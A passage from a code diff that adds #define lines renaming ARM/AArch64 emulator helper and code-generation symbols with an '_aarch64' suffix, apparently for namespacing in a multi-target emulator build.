gen_helper_vfp_sltos gen_helper_vfp_sltos_aarch64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_aarch64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_aarch64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_aarch64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_aarch64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_aarch64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_aarch64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_aarch64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_aarch64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_aarch64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_aarch64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_aarch64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_aarch64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_aarch64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_aarch64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_aarch64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_aarch64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_aarch64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_aarch64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_aarch64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_aarch64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_aarch64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_aarch64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_aarch64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_aarch64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_aarch64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_aarch64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_aarch64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_aarch64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_aarch64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_aarch64 +#define gen_helper_wfe gen_helper_wfe_aarch64 +#define gen_helper_wfi gen_helper_wfi_aarch64 +#define gen_hvc gen_hvc_aarch64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_aarch64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_aarch64 +#define gen_iwmmxt_address gen_iwmmxt_address_aarch64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_aarch64 +#define gen_jmp gen_jmp_aarch64 +#define gen_load_and_replicate gen_load_and_replicate_aarch64 +#define gen_load_exclusive gen_load_exclusive_aarch64 +#define gen_logic_CC gen_logic_CC_aarch64 +#define gen_logicq_cc gen_logicq_cc_aarch64 +#define gen_lookup_tb gen_lookup_tb_aarch64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_aarch64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_aarch64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_aarch64 +#define gen_muls_i64_i32 gen_muls_i64_i32_aarch64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_aarch64 +#define gen_mulxy gen_mulxy_aarch64 +#define gen_neon_add gen_neon_add_aarch64 +#define gen_neon_addl gen_neon_addl_aarch64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_aarch64 +#define gen_neon_bsl gen_neon_bsl_aarch64 +#define gen_neon_dup_high16 gen_neon_dup_high16_aarch64 +#define gen_neon_dup_low16 gen_neon_dup_low16_aarch64 +#define gen_neon_dup_u8 gen_neon_dup_u8_aarch64 +#define gen_neon_mull gen_neon_mull_aarch64 +#define gen_neon_narrow gen_neon_narrow_aarch64 +#define gen_neon_narrow_op gen_neon_narrow_op_aarch64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_aarch64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_aarch64 +#define gen_neon_negl gen_neon_negl_aarch64 +#define gen_neon_rsb gen_neon_rsb_aarch64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_aarch64 +#define gen_neon_subl gen_neon_subl_aarch64 +#define gen_neon_trn_u16 gen_neon_trn_u16_aarch64 +#define gen_neon_trn_u8 gen_neon_trn_u8_aarch64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_aarch64 +#define gen_neon_unzip gen_neon_unzip_aarch64 +#define gen_neon_widen gen_neon_widen_aarch64 +#define gen_neon_zip gen_neon_zip_aarch64 +#define gen_new_label gen_new_label_aarch64 +#define gen_nop_hint gen_nop_hint_aarch64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_aarch64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_aarch64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_aarch64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_aarch64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_aarch64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_aarch64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_aarch64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_aarch64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_aarch64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_aarch64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_aarch64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_aarch64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_aarch64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_aarch64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_aarch64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_aarch64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_aarch64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_aarch64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_aarch64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_aarch64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_aarch64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_aarch64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_aarch64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_aarch64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_aarch64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_aarch64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_aarch64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_aarch64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_aarch64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_aarch64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_aarch64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_aarch64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_aarch64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_aarch64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_aarch64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_aarch64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_aarch64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_aarch64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_aarch64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_aarch64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_aarch64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_aarch64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_aarch64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_aarch64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_aarch64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_aarch64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_aarch64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_aarch64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_aarch64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_aarch64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_aarch64 +#define gen_rev16 gen_rev16_aarch64 +#define gen_revsh gen_revsh_aarch64 +#define gen_rfe gen_rfe_aarch64 +#define gen_sar gen_sar_aarch64 +#define gen_sbc_CC gen_sbc_CC_aarch64 +#define gen_sbfx gen_sbfx_aarch64 +#define gen_set_CF_bit31 gen_set_CF_bit31_aarch64 +#define gen_set_condexec gen_set_condexec_aarch64 +#define gen_set_cpsr gen_set_cpsr_aarch64 +#define gen_set_label gen_set_label_aarch64 +#define gen_set_pc_im gen_set_pc_im_aarch64 +#define gen_set_psr gen_set_psr_aarch64 +#define gen_set_psr_im gen_set_psr_im_aarch64 +#define gen_shl gen_shl_aarch64 +#define gen_shr gen_shr_aarch64 +#define gen_smc gen_smc_aarch64 +#define gen_smul_dual gen_smul_dual_aarch64 +#define gen_srs gen_srs_aarch64 +#define gen_ss_advance gen_ss_advance_aarch64 +#define gen_step_complete_exception gen_step_complete_exception_aarch64 +#define gen_store_exclusive gen_store_exclusive_aarch64 +#define gen_storeq_reg gen_storeq_reg_aarch64 +#define gen_sub_carry gen_sub_carry_aarch64 +#define gen_sub_CC gen_sub_CC_aarch64 +#define gen_subq_msw gen_subq_msw_aarch64 +#define gen_swap_half gen_swap_half_aarch64 +#define gen_thumb2_data_op gen_thumb2_data_op_aarch64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_aarch64 +#define gen_ubfx gen_ubfx_aarch64 +#define gen_vfp_abs gen_vfp_abs_aarch64 +#define gen_vfp_add gen_vfp_add_aarch64 +#define gen_vfp_cmp gen_vfp_cmp_aarch64 +#define gen_vfp_cmpe gen_vfp_cmpe_aarch64 +#define gen_vfp_div gen_vfp_div_aarch64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_aarch64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_aarch64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_aarch64 +#define gen_vfp_ld gen_vfp_ld_aarch64 +#define gen_vfp_mrs gen_vfp_mrs_aarch64 +#define gen_vfp_msr gen_vfp_msr_aarch64 +#define gen_vfp_mul gen_vfp_mul_aarch64 +#define gen_vfp_neg gen_vfp_neg_aarch64 +#define gen_vfp_shto gen_vfp_shto_aarch64 +#define gen_vfp_sito gen_vfp_sito_aarch64 +#define gen_vfp_slto gen_vfp_slto_aarch64 +#define gen_vfp_sqrt gen_vfp_sqrt_aarch64 +#define gen_vfp_st gen_vfp_st_aarch64 +#define gen_vfp_sub gen_vfp_sub_aarch64 +#define gen_vfp_tosh gen_vfp_tosh_aarch64 +#define gen_vfp_tosi gen_vfp_tosi_aarch64 +#define gen_vfp_tosiz gen_vfp_tosiz_aarch64 +#define gen_vfp_tosl gen_vfp_tosl_aarch64 +#define gen_vfp_touh gen_vfp_touh_aarch64 +#define gen_vfp_toui gen_vfp_toui_aarch64 +#define gen_vfp_touiz gen_vfp_touiz_aarch64 +#define gen_vfp_toul gen_vfp_toul_aarch64 +#define gen_vfp_uhto gen_vfp_uhto_aarch64 +#define gen_vfp_uito gen_vfp_uito_aarch64 +#define gen_vfp_ulto gen_vfp_ulto_aarch64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_aarch64 +#define get_clock get_clock_aarch64 +#define get_clock_realtime get_clock_realtime_aarch64 +#define get_constraint_priority get_constraint_priority_aarch64 +#define get_float_exception_flags get_float_exception_flags_aarch64 +#define get_float_rounding_mode get_float_rounding_mode_aarch64 +#define get_fpstatus_ptr get_fpstatus_ptr_aarch64 +#define get_level1_table_address get_level1_table_address_aarch64 +#define get_mem_index get_mem_index_aarch64 +#define get_next_param_value get_next_param_value_aarch64 +#define get_opt_name get_opt_name_aarch64 +#define get_opt_value get_opt_value_aarch64 +#define get_page_addr_code get_page_addr_code_aarch64 +#define get_param_value get_param_value_aarch64 +#define get_phys_addr get_phys_addr_aarch64 +#define get_phys_addr_lpae get_phys_addr_lpae_aarch64 +#define get_phys_addr_mpu get_phys_addr_mpu_aarch64 +#define get_phys_addr_v5 get_phys_addr_v5_aarch64 +#define get_phys_addr_v6 get_phys_addr_v6_aarch64 +#define get_system_memory get_system_memory_aarch64 +#define get_ticks_per_sec get_ticks_per_sec_aarch64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_aarch64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__aarch64 +#define gt_cntfrq_access gt_cntfrq_access_aarch64 +#define gt_cnt_read gt_cnt_read_aarch64 +#define gt_cnt_reset gt_cnt_reset_aarch64 +#define gt_counter_access gt_counter_access_aarch64 +#define gt_ctl_write gt_ctl_write_aarch64 +#define gt_cval_write gt_cval_write_aarch64 +#define gt_get_countervalue gt_get_countervalue_aarch64 +#define gt_pct_access gt_pct_access_aarch64 +#define gt_ptimer_access gt_ptimer_access_aarch64 +#define gt_recalc_timer gt_recalc_timer_aarch64 +#define gt_timer_access gt_timer_access_aarch64 +#define gt_tval_read gt_tval_read_aarch64 +#define gt_tval_write gt_tval_write_aarch64 +#define gt_vct_access gt_vct_access_aarch64 +#define gt_vtimer_access gt_vtimer_access_aarch64 +#define guest_phys_blocks_free guest_phys_blocks_free_aarch64 +#define guest_phys_blocks_init guest_phys_blocks_init_aarch64 +#define handle_vcvt handle_vcvt_aarch64 +#define handle_vminmaxnm handle_vminmaxnm_aarch64 +#define handle_vrint handle_vrint_aarch64 +#define handle_vsel handle_vsel_aarch64 +#define has_help_option has_help_option_aarch64 +#define have_bmi1 have_bmi1_aarch64 +#define have_bmi2 have_bmi2_aarch64 +#define hcr_write hcr_write_aarch64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_aarch64 +#define helper_add_saturate helper_add_saturate_aarch64 +#define helper_add_setq helper_add_setq_aarch64 +#define helper_add_usaturate helper_add_usaturate_aarch64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_aarch64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_aarch64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_aarch64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_aarch64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_aarch64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_aarch64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_aarch64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_aarch64 +#define helper_be_stl_mmu helper_be_stl_mmu_aarch64 +#define helper_be_stq_mmu helper_be_stq_mmu_aarch64 +#define helper_be_stw_mmu helper_be_stw_mmu_aarch64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_aarch64 +#define helper_clz_arm helper_clz_arm_aarch64 +#define helper_cpsr_read helper_cpsr_read_aarch64 +#define helper_cpsr_write helper_cpsr_write_aarch64 +#define helper_crc32_arm helper_crc32_arm_aarch64 +#define helper_crc32c helper_crc32c_aarch64 +#define helper_crypto_aese helper_crypto_aese_aarch64 +#define helper_crypto_aesmc helper_crypto_aesmc_aarch64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_aarch64 +#define helper_crypto_sha1h helper_crypto_sha1h_aarch64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_aarch64 +#define helper_crypto_sha256h helper_crypto_sha256h_aarch64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_aarch64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_aarch64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_aarch64 +#define helper_dc_zva helper_dc_zva_aarch64 +#define helper_double_saturate helper_double_saturate_aarch64 +#define helper_exception_internal helper_exception_internal_aarch64 +#define helper_exception_return helper_exception_return_aarch64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_aarch64 +#define helper_get_cp_reg helper_get_cp_reg_aarch64 +#define helper_get_cp_reg64 helper_get_cp_reg64_aarch64 +#define helper_get_r13_banked helper_get_r13_banked_aarch64 +#define helper_get_user_reg helper_get_user_reg_aarch64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_aarch64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_aarch64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_aarch64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_aarch64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_aarch64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_aarch64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_aarch64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_aarch64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_aarch64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_aarch64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_aarch64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_aarch64 +#define helper_iwmmxt_align helper_iwmmxt_align_aarch64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_aarch64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_aarch64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_aarch64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_aarch64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_aarch64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_aarch64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_aarch64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_aarch64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_aarch64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_aarch64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_aarch64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_aarch64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_aarch64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_aarch64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_aarch64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_aarch64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_aarch64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_aarch64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_aarch64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_aarch64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_aarch64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_aarch64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_aarch64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_aarch64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_aarch64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_aarch64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_aarch64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_aarch64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_aarch64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_aarch64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_aarch64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_aarch64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_aarch64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_aarch64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_aarch64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_aarch64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_aarch64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_aarch64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_aarch64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_aarch64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_aarch64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_aarch64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_aarch64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_aarch64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_aarch64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_aarch64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_aarch64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_aarch64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_aarch64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_aarch64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_aarch64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_aarch64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_aarch64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_aarch64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_aarch64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_aarch64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_aarch64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_aarch64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_aarch64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_aarch64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_aarch64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_aarch64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_aarch64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_aarch64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_aarch64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_aarch64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_aarch64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_aarch64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_aarch64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_aarch64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_aarch64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_aarch64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_aarch64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_aarch64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_aarch64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_aarch64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_aarch64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_aarch64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_aarch64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_aarch64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_aarch64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_aarch64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_aarch64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_aarch64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_aarch64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_aarch64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_aarch64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_aarch64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_aarch64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_aarch64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_aarch64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_aarch64 +#define helper_ldb_cmmu helper_ldb_cmmu_aarch64 +#define helper_ldb_mmu helper_ldb_mmu_aarch64 +#define helper_ldl_cmmu helper_ldl_cmmu_aarch64 +#define helper_ldl_mmu helper_ldl_mmu_aarch64 +#define helper_ldq_cmmu helper_ldq_cmmu_aarch64 